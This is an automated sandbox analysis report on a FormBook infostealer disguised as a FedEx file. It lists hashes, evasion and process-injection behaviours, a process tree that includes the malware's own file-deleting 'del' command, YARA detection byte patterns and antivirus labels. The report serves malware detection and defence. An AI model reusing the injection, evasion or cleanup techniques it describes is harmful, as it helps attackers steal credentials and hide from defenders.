Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FedEx.com

Overview

General Information

Sample Name:FedEx.com (renamed file extension from com to exe)
Analysis ID:626183
MD5:917aa80e03e09b1d2b6619cc62cdbe22
SHA1:4124f6fa2d81e4f3db5bc62099fe4f03f71f091f
SHA256:57f4cf106379977932d3ca39bfceb27bf66b55b60465f3a6560d71983709ecea
Tags:exeformbookmodiloaderxloader
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • FedEx.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\FedEx.exe" MD5: 917AA80E03E09B1D2B6619CC62CDBE22)
    • logagent.exe (PID: 4356 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
      • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Rvsuben.exe (PID: 6372 cmdline: "C:\Users\Public\Libraries\Rvsuben.exe" MD5: 917AA80E03E09B1D2B6619CC62CDBE22)
          • logagent.exe (PID: 3676 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
        • Rvsuben.exe (PID: 7156 cmdline: "C:\Users\Public\Libraries\Rvsuben.exe" MD5: 917AA80E03E09B1D2B6619CC62CDBE22)
          • DpiScaling.exe (PID: 5892 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
        • WWAHost.exe (PID: 6004 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 1624 cmdline: /c del "C:\Windows\SysWOW64\logagent.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • autofmt.exe (PID: 5564 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • cmmon32.exe (PID: 3652 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
        • mstsc.exe (PID: 6092 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\nebusvR.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x57:$hotkey: \x0AHotKey=7
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\Public\Libraries\nebusvR.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b997:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18819:$sqlite3step: 68 34 1C 7B E1
    • 0x1892c:$sqlite3step: 68 34 1C 7B E1
    • 0x18848:$sqlite3text: 68 38 2A 90 C5
    • 0x1896d:$sqlite3text: 68 38 2A 90 C5
    • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
    00000016.00000002.643656925.0000000010410000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000016.00000002.643656925.0000000010410000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b997:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 79 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      20.0.logagent.exe.10410000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        20.0.logagent.exe.10410000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        20.0.logagent.exe.10410000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18819:$sqlite3step: 68 34 1C 7B E1
        • 0x1892c:$sqlite3step: 68 34 1C 7B E1
        • 0x18848:$sqlite3text: 68 38 2A 90 C5
        • 0x1896d:$sqlite3text: 68 38 2A 90 C5
        • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
        8.0.logagent.exe.10410000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          8.0.logagent.exe.10410000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 14 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: FedEx.exeVirustotal: Detection: 31%Perma Link
          Source: FedEx.exeReversingLabs: Detection: 58%
          Yara detected FormBook
          Source: Yara matchFile source: 20.0.logagent.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.logagent.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.DpiScaling.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.643656925.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.600971102.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.663406978.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.622514268.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.601348197.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.696412101.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.639113956.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.601926446.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.627979202.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.658059430.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.478775786.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.479688839.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.658204539.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.640834589.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.583342582.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.601178673.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.582254970.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.639730390.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.550265684.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.622677419.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.582967305.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.600603050.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.479381669.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.696533789.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.479097118.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.582561192.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.695229674.0000000000E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped file
          Source: C:\Users\Public\Libraries\Rvsuben.exeVirustotal: Detection: 31%Perma Link
          Source: C:\Users\Public\Libraries\Rvsuben.exeReversingLabs: Detection: 58%
          Source: 12.3.Rvsuben.exe.39f6370.345.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.388f8d8.78.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f5e50.321.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3897e24.385.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a0fe80.401.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38afd50.394.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a14008.465.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38a8008.109.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f8008.116.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38b0008.412.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39fc008.533.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a179c4.504.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a3ae58.567.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39ee75c.181.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3894708.312.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a0c6f8.346.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f3f4c.282.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39ebfec.165.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f6208.325.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38b2a78.445.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a177e4.495.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f3f68.288.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39facf8.474.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39fbf24.520.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a2eae4.457.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39ef630.74.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a05ab4.264.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3889914.113.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a226b8.336.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39ebfb8.156.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f7d50.147.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39e8ba8.26.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a114e4.417.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a46300.318.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a04008.256.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39fbf78.524.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39eff28.231.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3897f88.159.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38af950.376.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38b761c.484.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39efd08.226.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39e45d4.29.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f8008.117.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39e7360.56.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f7f40.403.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a15398.471.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.389e710.122.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39fa6b4.470.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a0fe80.401.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38afea0.407.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a179c4.502.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f6208.329.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a1d040.574.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3890090.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a1551c.456.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.388ff6c.234.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a3ae0c.562.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38af200.362.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38b0008.413.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f95ec.461.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39ef9e0.80.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39fbbf4.493.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38ce514.466.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f6760.133.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f8270.419.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38b79c4.502.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.389e4ac.557.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39e7a60.71.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a07040.272.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39ec008.167.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a18008.538.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a07ea0.283.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f5f48.45.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a0fc50.388.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39ef9e0.81.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f44b4.119.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a04008.254.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a07040.270.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39fc49c.541.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f86bc.432.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38a4008.254.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39fbea0.511.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38b26ac.467.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39fbea0.510.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f7904.361.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.388f1b0.185.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a2adc4.449.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3899278.414.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f4008.300.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f6ad4.137.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f5e6c.324.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a0c6f8.345.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f8b24.439.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 8.0.logagent.exe.10410000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.3.FedEx.exe.38a7008.266.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f7ed8.154.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39ef9e0.82.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38a75d8.276.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f44b4.121.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3892a88.257.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39e7360.57.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f3834.269.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f86bc.433.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39e7a60.72.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38aef64.354.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3894284.304.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3897eb4.393.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38d1bf4.318.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f8b40.444.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a1db94.556.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a2adc4.451.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f3ff0.297.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39edc60.49.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39ff508.197.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a46300.317.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38c27ec.341.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39edc60.50.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38b7658.488.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f7cb4.373.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a0f620.223.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39e7d08.83.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39fbf04.514.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39e4020.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38bfc58.592.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.388fc3c.220.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a22634.330.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39e7c70.76.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a28b5c.421.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3884314.12.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39ff808.209.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.388f630.74.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f5e6c.323.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a07ebc.289.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38b761c.482.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a5aa00.319.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3897c9c.366.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f86b0.431.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38b77a8.490.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39e4314.12.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a0deb8.360.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39ff848.217.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3897cdc.381.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a07fc8.293.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39fe82c.575.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f89e0.173.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a07008.266.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3895f48.45.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39eff28.230.unpackAvira: Label: TR/Patched.Ren.Gen
